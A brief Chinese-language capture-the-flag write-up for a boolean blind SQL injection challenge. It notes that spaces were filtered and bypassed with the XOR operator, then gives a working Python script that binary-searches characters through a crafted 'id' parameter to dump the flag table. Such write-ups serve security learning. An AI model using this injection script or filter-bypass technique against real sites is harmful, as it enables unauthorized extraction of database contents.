题目
布尔盲注
过程
题目关了,没图。
1.注入点很明显,bp来fuzz一下,看一下过滤
图片.png
除此还过滤了空格,使用^异或符绕过
import requests
import time
host = "http://eci-2zef68uxg0ojmyl1cdog.cloudeci1.ichunqiu.com/?"
def dumpTable():#脱裤
global host
ans=''
for i in range(1,1000):
low = 32
high = 128
mid = (low+high)//2
while low < high:
url = host + "id=1^(ascii(substr((select(flag)from(flag)),%d,1))<%d)^1" % (i,mid)
res = requests.get(url)
if "YES" in res.text:
high = mid
else:
low = mid+1
mid=(low+high)//2
if mid <= 32 or mid >= 127:
break
ans += chr(mid-1)
print("dumpTable is -> "+ans)
dumpTable()
